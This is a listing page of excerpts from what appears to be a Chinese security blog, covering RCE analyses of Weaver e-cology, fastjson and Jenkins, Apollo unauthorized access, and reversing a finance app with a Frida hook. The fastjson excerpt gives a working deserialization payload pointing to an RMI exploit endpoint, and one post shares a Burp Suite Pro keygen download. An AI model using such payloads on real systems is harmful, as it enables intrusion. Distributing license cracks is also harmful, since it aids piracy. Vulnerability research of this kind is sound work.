密码保护:泛微e-cology OA远程代码执行分析

密码保护:泛微e-cology OA远程代码执行分析
0x01 通告 2019年9月17日,泛微OA更新了一个安全问题,修复了一个远程代码执行漏洞,参考链接。 0x02 漏洞描述 泛微e-cology OA系统存在java Beanshell接口,且可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制进行命令执行。 0x03 漏洞分析 1.前置知识 从 resin.conf 的配置文件中可以看到resin关于servlet的处理 Copy to clipboard <web-app id="/" root-d...

Android逆向—苏宁金融app的data参数分析

Android逆向—苏宁金融app的data参数分析
Android逆向—苏宁金融app的data参数分析 一、用工具抓包 二、分析apk是否加壳 没有加壳,直接用jadx打开分析 查找data=参数 文件:su_ning_jin_rong.js Java.perform(function () { var encrypt1 = Java.use("org.bouncycastle.crypto.engines.SM2Engine"); console.log(encrypt1); encrypt1.encrypt.overload('[B', 'int', 'int').implementation = function (args1,args2,args3) { ...

安全扫描工具Arachni源码分析(一)

安全扫描工具Arachni源码分析(一)
Arachni是一个基于Ruby on Rails框架的Web安全漏洞扫描工具。 1. Ruby on Rails Ruby on Rails ,缩写ROR,是一个Web框架,包括两部分内容: Ruby 语言和 Rails 框架。Ruby一直以来流行于日本,直到2004年,26 岁的丹麦人 David Heinemeier Hansson 提出了Web框架 - Rails。这才让全世界人们,开始了解Ruby和Rails的灵活与高效。 1.1 Ruby 日本人松本行弘( Matsumoto Yukihiro),在 1993 年开始着手...

Apollo 配置中心未授权获取配置漏洞利用

Apollo 配置中心未授权获取配置漏洞利用
0x00:背景 Apollo(阿波罗)是携程框架部门研发的分布式配置中心,能够集中化管理应用不同环境、不同集群的配置,配置修改后能够实时推送到应用端,并且具备规范的权限、流程治理等特性,适用于微服务配置管理场景。 项目地址: https://github.com/ctripcorp/apollo 0x01:默认不安全 从 issues-2099 可以看出,根本不需要通过要鉴权的 apollo-dashboard ,只要通过伪造成客户端,即可未授权获取相应的...

Burp Suite Pro Loader&Keygen By surferxyz(附带v1.7.31原版)

Burp Suite Pro Loader&Keygen By surferxyz(附带v1.7.31原版)
surferxyz发布在EXETOOLS,地址:https://forum.exetools.com/showpost.php?p=112008&postcount=83,原文如下: I made a loader/keygen that should work on future versions of burp suite pro, unless they specifically target it/change the license scheme. Download loader/keygen here: http://www36.zippyshare.com/v/WRy3bGWf/file.html Works on 1.6.x up until the latest version 1....

PHP弱类型引发的漏洞实例

PHP弱类型引发的漏洞实例
*本文作者:补丁君,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。 我们知道PHP 是一门弱类型语言,不必向 PHP 声明该变量的数据类型,PHP 会根据变量的值,自动把变量的值转换为正确的数据类型,但在这个转换过程中就有可能引发一些安全问题。 类型转换   1、会先进行类型转换,再进行对比 2、会先比较类型,如果类型不同直接返回false,参考如下 注意:   1 . 当一个字符串被当作一个数值来取值,其...

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析
poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之...

Hacking Jenkins Part 2 – Abusing Meta Programming for Unauthenticated RCE!

Hacking Jenkins Part 2 – Abusing Meta Programming for Unauthenticated RCE!
English Version 中文版本 嗨! 大家今天過得好嗎? 這篇文章是 Hacking Jenkins 系列的下集! 給那些還沒看過上篇文章的同學,可以訪問下面鏈結,補充一些基本知識及了解之前如何從 Jenkins 中的動態路由機制到串出各種不同的攻擊鏈! Hacking Jenkins Part 1 - Play with Dynamic Routing 如上篇文章所說,為了最大程度發揮漏洞的效果,想尋找一個代碼執行的漏洞可以與 ACL 繞過漏洞搭配,成為一個不用認...